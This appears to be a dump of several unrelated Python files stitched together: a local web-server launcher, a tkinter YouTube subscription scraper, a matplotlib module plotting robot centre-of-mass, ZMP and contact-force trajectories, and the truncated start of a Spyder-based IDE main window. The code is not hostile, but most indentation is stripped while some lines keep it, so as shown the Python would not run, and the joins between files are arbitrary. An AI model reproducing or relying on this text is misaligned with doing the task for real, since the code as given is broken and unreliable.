from threading import Thread
import webbrowser, http.server, socketserver
import time
# Port number that the website binds to
port_number = 8080
server = None
def startServer(port):
Handler = http.server.SimpleHTTPRequestHandler
global server
server = socketserver.TCPServer(("", port), Handler)
print("Start server at port", port)
server.serve_forever()
def start(port):
thread = Thread(target=startServer, args=[port])
thread.start()
startTime = int(time.time())
    while not server:
        if int(time.time()) > startTime + 60:
            print("Time out")
            break
        time.sleep(0.1)  # avoid busy-waiting while the server starts
return server
def stop():
if server:
server.shutdown()
def openUrl():
url = "http://localhost:" + str(port_number)
webbrowser.open(url)
print(url + " is opened in browser")
if __name__ == "__main__":
start(port_number)
openUrl()
|
youtube_client.py
|
#!/usr/bin/env python3
import argparse
from tkinter import Tk
from tkinter import X as FILLX
from tkinter import BOTH as FILLBOTH
from tkinter.ttk import Treeview, Progressbar, Style, Frame, Label, Button
import threading
import requests
from bs4 import BeautifulSoup, SoupStrainer
import json
import datetime
import time
from collections import namedtuple
import sys
import os
from os.path import expanduser
from os.path import join as pjoin
TODAY = datetime.date.today().strftime("%m/%d/%y")
def clean_unicode(data):
"""
    since tkinter can't display unicode code points above 0xFFFF, they are
    replaced with '*' before being displayed
"""
return "".join([a if ord(a) < 0xFFFF else "*" for a in data ])
def get_videos(url):
"""
returns a list of videos from a given channel.
The list has the format of [(url, title), (url, title), ... , (url, title)]
"""
try:
strain = SoupStrainer("h3")
doc = BeautifulSoup(requests.get(url).text, "html.parser", parse_only=strain)
video_entries = doc.find_all("h3", attrs={"class" : "yt-lockup-title"})
return [(a.find("a").get("href"), a.find("a").text) for a in video_entries]
except Exception as e:
print("Problem with:", url, e)
return []
def get_today_videos():
history_file = expanduser(pjoin("~", ".config","ytsub","history.txt"))
TODAY = datetime.date.today().strftime("%m/%d/%y")
with open(history_file) as f:
for a in f:
date = a.strip().split()[1]
if date == TODAY:
yield " ".join(a.strip().split()[2:])
class YoutubeClient(Frame):
def __init__(self, dark_theme=False, master=None):
super().__init__(master)
self.pack(fill=FILLBOTH, expand=1)
if dark_theme:
Style().configure(".", background="#111111", foreground="white")
Style().configure("Treeview", background="#222222", fieldbackground="#222222", foreground="orange")
Style().map("Treeview.Heading", background=[('active', '#111111')], foreground=[('active','orange')])
Style().configure("Treeview.Heading", font=("TkDefaultFont", 18))
Style().map("TButton",
background=[('pressed', '#555555')],
foreground=[('active', "orange")])
Style().configure("TButton", font=("TkDefaultFont", 18))
Style().configure("TLabel", font=("TkDefaultFont", 18))
# results tree
self.results = Treeview(self)
self.results["columns"] = ("video")
self.results.column("#0", width=175, stretch=False)
self.results.heading("#0", text="channel")
self.results.column("video")
self.results.heading("video", text="video")
self.results.bind("<Double-Button-1>", self.clipboard)
self.results.pack(side="top", fill=FILLBOTH, expand=1)
# I/O row
self.button_bar = Frame(self)
self.button_bar.pack(side="top", fill=FILLX)
self.progressLabel = Label(self.button_bar, text="progress")
self.progressLabel.pack(side="left")
self.progress = Progressbar(self.button_bar, orient="horizontal", length=200, mode="determinate")
self.progress.pack(side="left")
self.update = Button(self.button_bar, text="Update", command=self.update_vids)
self.update.pack(side="right")
        self.show_today = Button(self.button_bar, text="show today's vids", command=self.show_todays_vids)
self.show_today.pack(side="right")
#########################
## callback functions ##
#########################
def update_vids(self):
self.clear_results()
t = threading.Thread(target=self.get_recent_videos)
t.daemon = True
t.start()
def show_todays_vids(self):
self.clear_results()
for a in get_today_videos():
channel = a.split()[0]
title = " ".join(a.split()[1:])
self.add_video(channel, title)
def clipboard(self, event):
index = self.results.focus()
if index and "values" in self.results.item(index) and len(self.results.item(index)["values"]):
video_title = self.results.item(index)["values"][0]
self.clipboard_clear()
self.clipboard_append(video_title)
##########################
### utility functions ###
##########################
def clear_results(self):
if self.results.get_children():
for a in self.results.get_children():
self.results.delete(a)
def add_video(self, channel, video_title):
# since tkinter can't display unicode over 0xFFFF, they are removed
# before being displayed on tkinter
channel = clean_unicode(channel)
video_title = clean_unicode(video_title)
channel_tree = [b for b in self.results.get_children() if b == channel]
if channel_tree:
video_leaf = self.results.insert(channel_tree[0], 0, values=(video_title,))
self.results.see(video_leaf)
else:
channel_tree_branch = self.results.insert("", 0, channel, text=channel)
video_leaf = self.results.insert(channel_tree_branch, 0, values=(video_title,))
self.results.see(video_leaf)
def clear_box(self):
for i in range(self.results.size()):
self.results.delete(0)
def get_recent_videos(self):
history_file = expanduser(pjoin("~", ".config","ytsub","history.txt"))
url_file = expanduser(pjoin("~", ".config", "ytsub", "channels.txt"))
TODAY = datetime.date.today().strftime("%m/%d/%y")
with open(history_file) as f:
old_videos = [a.split()[0].strip() for a in f]
with open(url_file) as f:
channels = [a.split() for a in f]
self.progress["maximum"] = len(channels)
for i, channel in enumerate(channels):
channel_url, channel_title = channel
self.progressLabel["text"] = "{0} / {1}".format(i + 1, len(channels))
time.sleep(3)
for video in get_videos(channel_url):
video_link, video_title = video
if video_link not in old_videos:
self.add_video(channel_title, video_title)
with open(history_file, "a") as f:
struct = [video_link, TODAY, channel_title, video_title]
f.write(" ".join(struct) + "\n")
# after values are added, increment the progress bar.
self.progress["value"] = i + 1
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("-g", "--gui", action="store_true", help="run gui")
parser.add_argument("-d", "--dark", action="store_true", help="Dark theme?")
args = parser.parse_args()
if args.gui:
root = Tk()
root.geometry('800x500+0+0')
root.wm_title("ytgui")
app = YoutubeClient(dark_theme=args.dark, master=root)
app.mainloop()
else:
history_file = expanduser(pjoin("~", ".config","ytsub","history.txt"))
url_file = expanduser(pjoin("~", ".config", "ytsub", "channels.txt"))
TODAY = datetime.date.today().strftime("%m/%d/%y")
with open(history_file) as f:
old_videos = [a.split()[0].strip() for a in f]
with open(url_file) as f:
channels = [a.split() for a in f]
for i, channel in enumerate(channels):
channel_url, channel_title = channel
time.sleep(3)
for video in get_videos(channel_url):
video_link, video_title = video
if video_link not in old_videos:
with open(history_file, "a") as f:
struct = [video_link, TODAY, channel_title, video_title]
f.write(" ".join(struct) + "\n")
|
plot.py
|
import numpy as np
import os
import pinocchio as pin
from mlp.utils.util import discretizeCurve, discretizeSE3CurveTranslation, discretizeDerivateCurve
import matplotlib
matplotlib.use("Qt4agg")
import matplotlib.pyplot as plt
from multiprocessing import Process
from mlp.utils.requirements import Requirements
pin.switchToNumpyArray()
plt.ioff()
def show(plt):
plt.show()
def show_non_blocking(plt):
    p = Process(target=show, args=(plt,))
p.start()
def addVerticalLineContactSwitch(cs, plt, linestyle="-.", color='k'):
for phase in cs.contactPhases:
plt.axvline(phase.timeFinal, linestyle=linestyle, color=color)
def plotEffectorTrajectoryWithReference(cs_ref, cs, dt):
labels = [
"x (m)", "y (m)", "z (m)", "dx (m/s)", "dy (m/s)", "dz (m/s)", "ddx (m/s^2)", "ddy (m/s^2)", "ddz (m/s^2)"
]
colors = ['r', 'g', 'b']
for eeName in cs.getAllEffectorsInContact():
traj = cs.concatenateEffectorTrajectories(eeName)
if traj.num_curves() > 0:
pos, timeline = discretizeSE3CurveTranslation(traj, dt)
vel = discretizeDerivateCurve(traj, dt, 1)[0][:3, :]
acc = discretizeDerivateCurve(traj, dt, 2)[0][:3, :]
values = np.vstack([pos, vel, acc])
traj_ref = cs_ref.concatenateEffectorTrajectories(eeName)
pos_ref = discretizeSE3CurveTranslation(traj_ref, dt)[0]
vel_ref = discretizeDerivateCurve(traj_ref, dt, 1)[0][:3, :]
acc_ref = discretizeDerivateCurve(traj_ref, dt, 2)[0][:3, :]
values_ref = np.vstack([pos_ref, vel_ref, acc_ref])
fig, ax = plt.subplots(3, 3)
fig.canvas.set_window_title("Trajectory for effector " + eeName + " (dashed = reference)")
fig.suptitle("Trajectory for effector " + eeName + " (dashed = reference)", fontsize=20)
for i in range(3): # line = pos,vel,acc
for j in range(3): # col = x,y,z
ax_sub = ax[i, j]
ax_sub.plot(timeline.T, values[i * 3 + j, :].T, color=colors[j])
ax_sub.plot(timeline.T, values_ref[i * 3 + j, :].T, color=colors[j], linestyle="dashed")
ax_sub.set_xlabel('time (s)')
ax_sub.set_ylabel(labels[i * 3 + j])
addVerticalLineContactSwitch(cs, ax_sub)
ax_sub.grid(False)
plt.show(block=False)
def plotEffectorTrajectory(cs, dt, name_prefix = ""):
labels = [
"x (m)", "y (m)", "z (m)", "dx (m/s)", "dy (m/s)", "dz (m/s)", "ddx (m/s^2)", "ddy (m/s^2)", "ddz (m/s^2)"
]
colors = ['r', 'g', 'b']
for eeName in cs.getAllEffectorsInContact():
traj = cs.concatenateEffectorTrajectories(eeName)
pos, timeline = discretizeSE3CurveTranslation(traj, dt)
vel = discretizeDerivateCurve(traj, dt, 1)[0][:3, :]
acc = discretizeDerivateCurve(traj, dt, 2)[0][:3, :]
values = np.vstack([pos, vel, acc])
fig, ax = plt.subplots(3, 3)
fig.canvas.set_window_title(name_prefix+" trajectory for effector " + eeName)
fig.suptitle(name_prefix+" trajectory for effector " + eeName, fontsize=20)
for i in range(3): # line = pos,vel,acc
for j in range(3): # col = x,y,z
ax_sub = ax[i, j]
ax_sub.plot(timeline.T, values[i * 3 + j, :].T, color=colors[j])
ax_sub.set_xlabel('time (s)')
ax_sub.set_ylabel(labels[i * 3 + j])
addVerticalLineContactSwitch(cs, ax_sub)
ax_sub.grid(False)
plt.show(block=False)
def plotEffectorError(cs_ref, cs, dt):
labels = ["x (m)", "y (m)", "z (m)"]
colors = ['r', 'g', 'b']
for eeName in cs.getAllEffectorsInContact():
traj = cs.concatenateEffectorTrajectories(eeName)
traj_ref = cs_ref.concatenateEffectorTrajectories(eeName)
        assert traj.min() == traj_ref.min(), "In plotEffectorError: reference and computed trajectories do not start at the same time"
        assert traj.max() == traj_ref.max(), "In plotEffectorError: reference and computed trajectories do not end at the same time"
pos_ref, timeline = discretizeSE3CurveTranslation(traj_ref, dt)
pos = discretizeSE3CurveTranslation(traj, dt)[0]
error = pos - pos_ref
fig, ax = plt.subplots(3, 1)
fig.canvas.set_window_title("Effector tracking error : " + eeName)
fig.suptitle("Effector tracking error : " + eeName, fontsize=20)
for i in range(3): # line = x,y,z
ax_sub = ax[i]
ax_sub.plot(timeline.T, error[i, :].T, color=colors[i])
ax_sub.set_xlabel('time (s)')
ax_sub.set_ylabel(labels[i])
ax_sub.yaxis.grid(False)
addVerticalLineContactSwitch(cs, ax_sub)
def plotCOMdifference(cs_ref, cs, dt, name):
labels = ["x (m)", "y (m)", "z (m)"]
colors = ['r', 'g', 'b']
fig, ax = plt.subplots(3, 1)
fig.canvas.set_window_title(name)
fig.suptitle(name, fontsize=20)
traj = cs.concatenateCtrajectories()
traj_ref = cs_ref.concatenateCtrajectories()
pos, timeline = discretizeCurve(traj, dt)
pos_ref = discretizeCurve(traj_ref, dt)[0]
error = pos - pos_ref
for i in range(3): # line = x,y,z
ax_sub = ax[i]
ax_sub.plot(timeline.T, error[i, :].T, color=colors[i])
ax_sub.set_xlabel('time (s)')
ax_sub.set_ylabel(labels[i])
ax_sub.yaxis.grid()
addVerticalLineContactSwitch(cs, ax_sub)
def plotAMdifference(cs_ref, cs, dt, name):
labels = ["x", "y", "z"]
colors = ['r', 'g', 'b']
fig, ax = plt.subplots(3, 1)
fig.canvas.set_window_title(name)
fig.suptitle(name, fontsize=20)
traj = cs.concatenateLtrajectories()
traj_ref = cs_ref.concatenateLtrajectories()
pos, timeline = discretizeCurve(traj, dt)
pos_ref = discretizeCurve(traj_ref, dt)[0]
error = pos - pos_ref
for i in range(3): # line = x,y,z
ax_sub = ax[i]
ax_sub.plot(timeline.T, error[i, :].T, color=colors[i])
ax_sub.set_xlabel('time (s)')
ax_sub.set_ylabel(labels[i])
ax_sub.yaxis.grid()
addVerticalLineContactSwitch(cs, ax_sub)
def plotZMP(cs_ref_iters, cs_iters, dt, circle_radius=0.):
fig = plt.figure("ZMP(xy)")
ax = fig.gca()
plt.suptitle("ZMP(xy); dashed = ZMP reference ; lines = ZMP from wholebody ; green = feet placements")
ZMPs_t = []
ZMPs_ref = []
for cs in cs_iters:
ZMPs_t += [discretizeCurve(cs.concatenateZMPtrajectories(), dt)[0]]
for cs_ref in cs_ref_iters:
ZMPs_ref += [discretizeCurve(cs_ref.concatenateZMPtrajectories(), dt)[0]]
colors = ['b', 'g','r', 'c', 'm', 'y']
for k, ZMP_t in enumerate(ZMPs_t):
plt.plot(ZMP_t[0, :].T, ZMP_t[1, :].T, color=colors[k], label="iter "+str(k))
for k, ZMP_ref in enumerate(ZMPs_ref):
plt.plot(ZMP_ref[0, :].T, ZMP_ref[1, :].T, color=colors[k], linestyle='dashed')
plt.xlabel("x position (m)")
plt.ylabel("y position (m)")
plt.axis('equal')
plt.grid(False)
colors_circles = ['g', 'r', 'b', 'y']
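    # `cs` below is the last contact sequence left over from the loop above;
    # the feet placements are assumed identical across iterations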
effector_list = cs.getAllEffectorsInContact()
for p in cs.contactPhases:
        # plot an 'x' at the center of each foot contact,
        # and a circle of radius `circle_radius` around it (the size of the flexibility):
for eeName in p.effectorsInContact():
pos = p.contactPatch(eeName).placement.translation
color = colors_circles[effector_list.index(eeName)]
plt.plot(pos[0], pos[1], marker="x", markersize=20, color=color)
circle_r = plt.Circle((pos[0], pos[1]), circle_radius, color='g', fill=False)
ax.add_artist(circle_r)
ax.legend()
def plotZMPdifferences(cs_ref_iters, cs_iters, dt):
fig, ax = plt.subplots(len(cs_ref_iters), 2)
fig.canvas.set_window_title("Difference between the ZMP trajectories")
plt.suptitle("Difference between the ZMP trajectories from the centroidal solver and the wholebody after iterations of the dynamic filter.")
labels = ["X", "Y"]
for i, cs in enumerate(cs_iters):
ref, timeline = discretizeCurve(cs_ref_iters[i].concatenateZMPtrajectories(), dt)
zmp = discretizeCurve(cs.concatenateZMPtrajectories(), dt)[0]
diff = zmp - ref
for j in range(2):
ax_sub = ax[i, j]
ax_sub.plot(timeline.T, diff[j,:])
ax_sub.set_xlabel('time (s)')
ax_sub.set_ylabel(labels[j]+" values for iter " + str(i))
def plotCOMTrajWithReferences(cs_ref, cs, dt):
labels = [
"x (m)", "y (m)", "z (m)", "dx (m/s)", "dy (m/s)", "dz (m/s)", "ddx (m/s^2)", "ddy (m/s^2)", "ddz (m/s^2)"
]
colors = ['r', 'g', 'b']
fig, ax = plt.subplots(3, 3)
fig.canvas.set_window_title("COM trajectory (dashed = reference)")
fig.suptitle("COM trajectory (dashed = reference)", fontsize=20)
c_t, timeline = discretizeCurve(cs.concatenateCtrajectories(), dt)
dc_t = discretizeCurve(cs.concatenateDCtrajectories(), dt)[0]
ddc_t = discretizeCurve(cs.concatenateDDCtrajectories(), dt)[0]
c_ref = discretizeCurve(cs_ref.concatenateCtrajectories(), dt)[0]
dc_ref = discretizeCurve(cs_ref.concatenateDCtrajectories(), dt)[0]
ddc_ref = discretizeCurve(cs_ref.concatenateDDCtrajectories(), dt)[0]
values = np.vstack([c_t, dc_t, ddc_t])
values_ref = np.vstack([c_ref, dc_ref, ddc_ref])
for i in range(3): # line = pos,vel,acc
for j in range(3): # col = x,y,z
ax_sub = ax[i, j]
ax_sub.plot(timeline.T, values[i * 3 + j, :].T, color=colors[j])
ax_sub.plot(timeline.T, values_ref[i * 3 + j, :].T, color=colors[j], linestyle="dashed")
ax_sub.set_xlabel('time (s)')
ax_sub.set_ylabel(labels[i * 3 + j])
ax_sub.yaxis.grid()
addVerticalLineContactSwitch(cs, ax_sub)
def plotCOMTraj(cs, dt, name_suffixe = ""):
labels = [
"x (m)", "y (m)", "z (m)", "dx (m/s)", "dy (m/s)", "dz (m/s)", "ddx (m/s^2)", "ddy (m/s^2)", "ddz (m/s^2)"
]
colors = ['r', 'g', 'b']
fig, ax = plt.subplots(3, 3)
fig.canvas.set_window_title("COM trajectory"+name_suffixe)
fig.suptitle("COM trajectory"+name_suffixe, fontsize=20)
c_t, timeline = discretizeCurve(cs.concatenateCtrajectories(), dt)
dc_t = discretizeCurve(cs.concatenateDCtrajectories(), dt)[0]
ddc_t = discretizeCurve(cs.concatenateDDCtrajectories(), dt)[0]
values = np.vstack([c_t, dc_t, ddc_t])
for i in range(3): # line = pos,vel,acc
for j in range(3): # col = x,y,z
ax_sub = ax[i, j]
ax_sub.plot(timeline.T, values[i * 3 + j, :].T, color=colors[j])
ax_sub.set_xlabel('time (s)')
ax_sub.set_ylabel(labels[i * 3 + j])
ax_sub.yaxis.grid()
addVerticalLineContactSwitch(cs, ax_sub)
def plotCOMTrajChanges(cs0, cs1, dt):
labels = [
"x (m)", "y (m)", "z (m)", "dx (m/s)", "dy (m/s)", "dz (m/s)", "ddx (m/s^2)", "ddy (m/s^2)", "ddz (m/s^2)"
]
colors = ['r', 'g', 'b']
fig, ax = plt.subplots(3, 3)
fig.canvas.set_window_title("Comparison of CoM trajectories")
fig.suptitle("Comparison of CoM trajectories. dashed: before dynamic filter, line: after", fontsize=20)
c0_t, timeline = discretizeCurve(cs0.concatenateCtrajectories(), dt)
dc0_t = discretizeCurve(cs0.concatenateDCtrajectories(), dt)[0]
ddc0_t = discretizeCurve(cs0.concatenateDDCtrajectories(), dt)[0]
values0 = np.vstack([c0_t, dc0_t, ddc0_t])
c1_t = discretizeCurve(cs1.concatenateCtrajectories(), dt)[0]
dc1_t = discretizeCurve(cs1.concatenateDCtrajectories(), dt)[0]
ddc1_t = discretizeCurve(cs1.concatenateDDCtrajectories(), dt)[0]
values1 = np.vstack([c1_t, dc1_t, ddc1_t])
for i in range(3): # line = pos,vel,acc
for j in range(3): # col = x,y,z
ax_sub = ax[i, j]
ax_sub.plot(timeline.T, values0[i * 3 + j, :].T, color=colors[j], linestyle="dashed")
ax_sub.plot(timeline.T, values1[i * 3 + j, :].T, color=colors[j])
ax_sub.set_xlabel('time (s)')
ax_sub.set_ylabel(labels[i * 3 + j])
ax_sub.yaxis.grid()
addVerticalLineContactSwitch(cs0, ax_sub)
def plotAMTrajWithReferences(cs_ref, cs, dt):
labels = ["x", "y", "z", "dx", "dy", "dz"]
colors = ['r', 'g', 'b']
fig, ax = plt.subplots(2, 3)
fig.canvas.set_window_title("AM trajectory (dashed = reference)")
fig.suptitle("AM trajectory (dashed = reference)", fontsize=20)
L_t, timeline = discretizeCurve(cs.concatenateLtrajectories(), dt)
dL_t = discretizeCurve(cs.concatenateDLtrajectories(), dt)[0]
L_ref = discretizeCurve(cs_ref.concatenateLtrajectories(), dt)[0]
dL_ref = discretizeCurve(cs_ref.concatenateDLtrajectories(), dt)[0]
values = np.vstack([L_t, dL_t])
values_ref = np.vstack([L_ref, dL_ref])
for i in range(2): # line = L,dL
for j in range(3): # col = x,y,z
ax_sub = ax[i, j]
ax_sub.plot(timeline.T, values[i * 3 + j, :].T, color=colors[j])
ax_sub.plot(timeline.T, values_ref[i * 3 + j, :].T, color=colors[j], linestyle="dashed")
ax_sub.set_xlabel('time (s)')
ax_sub.set_ylabel(labels[i * 3 + j])
ax_sub.yaxis.grid()
addVerticalLineContactSwitch(cs, ax_sub)
def plotAMTraj(cs, dt, name_suffixe = ""):
labels = ["x", "y", "z", "dx", "dy", "dz"]
colors = ['r', 'g', 'b']
fig, ax = plt.subplots(2, 3)
fig.canvas.set_window_title("AM trajectory"+name_suffixe)
fig.suptitle("AM trajectory"+name_suffixe, fontsize=20)
L_t, timeline = discretizeCurve(cs.concatenateLtrajectories(), dt)
dL_t = discretizeCurve(cs.concatenateDLtrajectories(), dt)[0]
values = np.vstack([L_t, dL_t])
for i in range(2): # line = L,dL
for j in range(3): # col = x,y,z
ax_sub = ax[i, j]
ax_sub.plot(timeline.T, values[i * 3 + j, :].T, color=colors[j])
ax_sub.set_xlabel('time (s)')
ax_sub.set_ylabel(labels[i * 3 + j])
ax_sub.yaxis.grid()
addVerticalLineContactSwitch(cs, ax_sub)
def plotAMTrajChanges(cs0, cs1, dt):
labels = ["x", "y", "z", "dx", "dy", "dz"]
colors = ['r', 'g', 'b']
fig, ax = plt.subplots(2, 3)
fig.canvas.set_window_title("Comparison of AM trajectories")
fig.suptitle("Comparison of AM trajectories. dashed: before dynamic filter, line: after", fontsize=20)
L0_t, timeline = discretizeCurve(cs0.concatenateLtrajectories(), dt)
dL0_t = discretizeCurve(cs0.concatenateDLtrajectories(), dt)[0]
values0 = np.vstack([L0_t, dL0_t])
L1_t = discretizeCurve(cs1.concatenateLtrajectories(), dt)[0]
dL1_t = discretizeCurve(cs1.concatenateDLtrajectories(), dt)[0]
values1 = np.vstack([L1_t, dL1_t])
for i in range(2): # line = L,dL
for j in range(3): # col = x,y,z
ax_sub = ax[i, j]
ax_sub.plot(timeline.T, values0[i * 3 + j, :].T, color=colors[j], linestyle="dashed")
ax_sub.plot(timeline.T, values1[i * 3 + j, :].T, color=colors[j])
ax_sub.set_xlabel('time (s)')
ax_sub.set_ylabel(labels[i * 3 + j])
ax_sub.yaxis.grid()
addVerticalLineContactSwitch(cs0, ax_sub)
def plotContactForces(cs, dt):
colors = ['r', 'g', 'b', 'y']
fig = plt.figure("Contact normal force")
plt.suptitle("Contact normal force")
ax = fig.gca()
ax.set_xlabel('time (s)')
ax.set_ylabel("Contact normal force (N)")
ax.yaxis.grid()
sum_f = None
for i, eeName in enumerate(cs.getAllEffectorsInContact()):
force, timeline = discretizeCurve(cs.concatenateNormalForceTrajectories(eeName), dt)
ax.plot(timeline.T, force.T, color=colors[i], label=eeName)
if sum_f is None:
sum_f = force
else:
sum_f += force
ax.plot(timeline.T, sum_f.T, color="k", label="sum")
addVerticalLineContactSwitch(cs, ax)
ax.legend()
def plotKneeTorque(cs, dt, kneeIds, offset):
colors = ['r', 'g', 'b', 'y']
fig = plt.figure("Knee torque")
plt.suptitle("Knee torque")
ax = fig.gca()
ax.set_xlabel('time (s)')
ax.set_ylabel("Torque")
ax.yaxis.grid()
tau, timeline = discretizeCurve(cs.concatenateTauTrajectories(), dt)
for k, name in enumerate(kneeIds.keys()):
ax.plot(timeline.T, tau[kneeIds[name] - offset, :].T, color=colors[k], label=name)
    # subtract `offset` because kneeIds index the configuration vector, while
    # tau is expressed in the actuation space (no free-flyer entries)
addVerticalLineContactSwitch(cs, ax)
ax.legend()
def plotTimingChanges(cs, cs_iters, cfg):
sequences = [cs] + cs_iters
values = []
for cs in sequences:
timings = []
for phase in cs.contactPhases:
timings += [phase.duration]
values += [np.array(timings)]
colors = ['k', 'b', 'g','r', 'c', 'm', 'y']
fig = plt.figure("Evolution of phase duration with dynamic filter")
plt.suptitle("Evolution of phase duration dynamic filter")
bar_width = 0.2
ax = fig.gca()
ax.set_xlabel('phase id')
ax.set_ylabel("duration(s)")
ax.yaxis.grid()
x_axis = np.arange(cs.size())
for i, val in enumerate(values):
plt.bar(x_axis + bar_width * i, val, bar_width, color=colors[i], edgecolor='k')
labels = ["init guess"] + ["iter "+str(i) for i in range(len(values)-1)]
ax.legend(labels)
ax.legend()
def saveAllFigures(path_dir):
if not os.path.exists(path_dir):
os.makedirs(path_dir)
for i in plt.get_fignums():
fig = plt.figure(i)
fig.savefig(path_dir + "/" + str(fig._suptitle.get_text()) + ".eps", dpi=600)
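# A usage sketch (hypothetical directory): saveAllFigures("/tmp/plots") writes
# every currently open figure to "<dir>/<suptitle>.eps" at 600 dpi.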
def plotALLFromWB(cs_ref_iters, cs_iters, cfg):
cs = cs_iters[-1]
cs_ref = cs_ref_iters[-1]
print("Plotting ...")
plt.rcParams['axes.linewidth'] = plt.rcParams['font.size'] / 30.
plt.rcParams['lines.linewidth'] = plt.rcParams['font.size'] / 30.
display = cfg.DISPLAY_PLOT
save = cfg.SAVE_PLOT
path = cfg.OUTPUT_DIR + "/plot/" + cfg.DEMO_NAME
dt = cfg.IK_dt
if cs_ref.haveCOMtrajectories():
if cs.haveCOMtrajectories():
plotCOMTrajWithReferences(cs_ref, cs, dt)
plotCOMdifference(cs_ref, cs, dt,"CoM tracking error")
elif not cfg.PLOT_CENTROIDAL:
plotCOMTraj(cs_ref, dt)
    # else: it has already been plotted by the centroidal script
if cs_ref.haveAMtrajectories():
if cs.haveAMtrajectories():
plotAMTrajWithReferences(cs_ref, cs, dt)
plotAMdifference(cs_ref, cs, dt, "AM tracking error")
elif not cfg.PLOT_CENTROIDAL:
plotAMTraj(cs_ref, dt)
    # else: it has already been plotted by the centroidal script
if cs.haveZMPtrajectories():
for cs_ref in cs_ref_iters:
Requirements.requireZMPtrajectories(cs_ref, cfg)
plotZMP(cs_ref_iters, cs_iters, dt, cfg.PLOT_CIRCLE_RADIUS)
plotZMPdifferences(cs_ref_iters, cs_iters, dt)
if cs.haveTorquesTrajectories():
offset = cs.contactPhases[0].q_t.dim() - cs.contactPhases[0].tau_t.dim()
plotKneeTorque(cs, dt, cfg.Robot.kneeIds, offset)
if cs.haveContactForcesTrajectories():
plotContactForces(cs, dt)
if cs.haveEffectorsTrajectories(1e-1):
plotEffectorTrajectoryWithReference(cs_ref, cs, dt)
plotEffectorError(cs_ref, cs, dt)
else:
plotEffectorTrajectory(cs, dt, "Reference")
if display:
plt.show(block=False)
if save and path:
saveAllFigures(path)
print("Plotting Done.")
def compareCentroidal(cs, cs_iters, cfg):
plt.rcParams['axes.linewidth'] = plt.rcParams['font.size'] / 30.
plt.rcParams['lines.linewidth'] = plt.rcParams['font.size'] / 30.
display = cfg.DISPLAY_PLOT
save = cfg.SAVE_PLOT
path = cfg.OUTPUT_DIR + "/plot/" + cfg.DEMO_NAME
dt = cfg.SOLVER_DT
if cs_iters[0].contactPhases[-1].timeFinal != cs_iters[-1].contactPhases[-1].timeFinal:
print("Cannot plot differences, the two curves do not have the same duration.")
plotTimingChanges(cs, cs_iters, cfg)
else:
plotAMdifference(cs_iters[0], cs_iters[-1], dt, "Dynamic filter changes on AM trajectory")
plotCOMdifference(cs_iters[0], cs_iters[-1], dt, "Dynamic filter changes on CoM trajectory")
plotCOMTrajChanges(cs_iters[0], cs_iters[-1], dt)
plotAMTrajChanges(cs_iters[0], cs_iters[-1], dt)
if display:
plt.show(block=False)
if save and path:
saveAllFigures(path)
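# A minimal invocation sketch (hedged: `cs_ref_list`, `cs_list` and `cfg` stand
# for the objects produced by an mlp run; they are not defined in this module):
#     plotALLFromWB(cs_ref_list, cs_list, cfg)
#     compareCentroidal(cs_list[0], cs_list, cfg)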
|
mainwindow.py
|
# -*- coding: utf-8 -*-
#
# Copyright © Spyder Project Contributors
# Licensed under the terms of the MIT License
# (see spyder/__init__.py for details)
"""
Spyder, the Scientific PYthon Development EnviRonment
=====================================================
Developed and maintained by the Spyder Project
Contributors
Copyright © Spyder Project Contributors
Licensed under the terms of the MIT License
(see spyder/__init__.py for details)
"""
# =============================================================================
# Stdlib imports
# =============================================================================
from __future__ import print_function
import atexit
import errno
import os
import os.path as osp
import re
import shutil
import signal
import socket
import subprocess
import sys
import threading
import traceback
#==============================================================================
# Keeping a reference to the original sys.exit before patching it
#==============================================================================
ORIGINAL_SYS_EXIT = sys.exit
#==============================================================================
# Check requirements
#==============================================================================
from spyder import requirements
requirements.check_path()
requirements.check_qt()
#==============================================================================
# Windows only: support for hiding console window when started with python.exe
#==============================================================================
set_attached_console_visible = None
is_attached_console_visible = None
set_windows_appusermodelid = None
if os.name == 'nt':
from spyder.utils.windows import (set_attached_console_visible,
is_attached_console_visible,
set_windows_appusermodelid)
#==============================================================================
# Workaround: importing rope.base.project here, otherwise this module can't
# be imported if Spyder was executed from another folder than spyder
#==============================================================================
try:
import rope.base.project # analysis:ignore
except ImportError:
pass
#==============================================================================
# Qt imports
#==============================================================================
from qtpy import API, PYQT5
from qtpy.compat import from_qvariant
from qtpy.QtCore import (QByteArray, QCoreApplication, QPoint, QSize, Qt,
QThread, QTimer, QUrl, Signal, Slot)
from qtpy.QtGui import QColor, QDesktopServices, QKeySequence, QPixmap
from qtpy.QtWidgets import (QAction, QApplication, QDockWidget, QMainWindow,
QMenu, QMessageBox, QShortcut, QSplashScreen,
QStyleFactory)
# Avoid a "Cannot mix incompatible Qt library" error on Windows platforms
# when PySide is selected by the QT_API environment variable and when PyQt4
# is also installed (or any other Qt-based application prepending a directory
# containing incompatible Qt DLLs versions in PATH):
from qtpy import QtSvg # analysis:ignore
# Avoid a bug in Qt: https://bugreports.qt.io/browse/QTBUG-46720
from qtpy import QtWebEngineWidgets # analysis:ignore
# To catch font errors in QtAwesome
from qtawesome.iconic_font import FontError
#==============================================================================
# Proper high DPI scaling is available in Qt >= 5.6.0. This attribute must
# be set before creating the application.
#==============================================================================
from spyder.config.main import CONF
if CONF.get('main', 'high_dpi_scaling'):
high_dpi_scaling = True
else:
high_dpi_scaling = False
if hasattr(Qt, 'AA_EnableHighDpiScaling'):
QCoreApplication.setAttribute(Qt.AA_EnableHighDpiScaling, high_dpi_scaling)
#==============================================================================
# Create our QApplication instance here because it's needed to render the
# splash screen created below
#==============================================================================
from spyder.utils.qthelpers import qapplication, MENU_SEPARATOR
MAIN_APP = qapplication()
#==============================================================================
# Create splash screen out of MainWindow to reduce perceived startup time.
#==============================================================================
from spyder.config.base import _, get_image_path, DEV, PYTEST
if not PYTEST:
SPLASH = QSplashScreen(QPixmap(get_image_path('Tellurium_splash.png'), 'png'))
SPLASH_FONT = SPLASH.font()
SPLASH_FONT.setPixelSize(10)
SPLASH.setFont(SPLASH_FONT)
SPLASH.show()
SPLASH.showMessage(_("Initializing..."), Qt.AlignBottom | Qt.AlignCenter |
Qt.AlignAbsolute, QColor(Qt.black))
QApplication.processEvents()
else:
SPLASH = None
#==============================================================================
# Local utility imports
#==============================================================================
from spyder import __version__, __project_url__, __forum_url__, get_versions
from spyder.config.base import (get_conf_path, get_module_data_path,
get_module_source_path, STDERR, DEBUG,
debug_print, MAC_APP_NAME, get_home_dir,
running_in_mac_app, get_module_path,
reset_config_files)
from spyder.config.main import OPEN_FILES_PORT
from spyder.config.utils import IMPORT_EXT, is_gtk_desktop
